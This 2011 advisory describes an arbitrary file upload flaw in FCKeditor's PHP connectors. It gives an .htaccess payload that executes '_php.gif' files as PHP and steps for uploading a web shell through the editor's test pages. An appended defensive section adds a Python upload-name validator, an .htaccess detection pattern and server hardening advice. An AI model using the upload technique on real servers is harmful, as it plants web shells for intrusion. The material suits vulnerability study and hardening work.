FCKeditor arbitrary file upload vulnerability (all PHP versions)
Author: anonymous  Source: compiled by this site  Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2. Now upload this .htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now the shell is available on the server.
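The root cause in steps 4 and 5 is that the upload handler rewrites a rejected name instead of refusing it, and that the upload directory honours an attacker-supplied .htaccess. As an added defensive example (not part of this advisory and not FCKeditor code), here is a Python upload-name validator that refuses dotfiles and double extensions outright, plus a check that flags an .htaccess mapping files onto the PHP handler; the extension whitelist is an assumption.

```python
import re

# Allowed upload extensions (constructed whitelist for this example).
ALLOWED_EXTENSIONS = {"gif", "jpg", "jpeg", "png"}

# Apache directives that make a file execute as PHP; any of them inside an
# uploaded .htaccess is a strong indicator of the technique in the advisory.
_PHP_HANDLER_RE = re.compile(
    r"^\s*(SetHandler|AddHandler|AddType)\s+.*php", re.IGNORECASE | re.MULTILINE
)
# Stems such as "shell_php" (the form FCKeditor's rename produces).
_PHP_STEM_RE = re.compile(r"(^|[._-])php\d?($|[._-])", re.IGNORECASE)


def is_safe_upload_name(name: str) -> bool:
    """Return True only for names a hardened upload handler should accept.

    A rejected name is never rewritten: the rewritten form "shell_php.gif"
    is exactly what the advisory's FilesMatch "_php.gif" rule targets.
    """
    base = name.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]   # drop any path part
    if not base or base.startswith("."):                  # dotfiles: .htaccess
        return False
    parts = base.split(".")
    if len(parts) != 2:                                   # exactly one extension
        return False
    stem, ext = parts
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem):
        return False
    if _PHP_STEM_RE.search(stem):                         # defence in depth
        return False
    return ext.lower() in ALLOWED_EXTENSIONS


def htaccess_sets_php_handler(content: str) -> bool:
    """Detect an .htaccess that maps some file pattern onto the PHP handler."""
    return _PHP_HANDLER_RE.search(content) is not None


# Constructed sample: the .htaccess body shown in the advisory above.
SAMPLE_HTACCESS = '<FilesMatch "_php.gif">\nSetHandler application/x-httpd-php\n</FilesMatch>\n'

if __name__ == "__main__":
    for n in (".htaccess", "shell.php.gif", "shell_php.gif", "photo.gif"):
        print(n, is_safe_upload_name(n))
    print("htaccess flagged:", htaccess_sets_php_handler(SAMPLE_HTACCESS))
```

Setting AllowOverride None on the upload directory removes the .htaccess vector independently of the filename check, so the two controls should be used together.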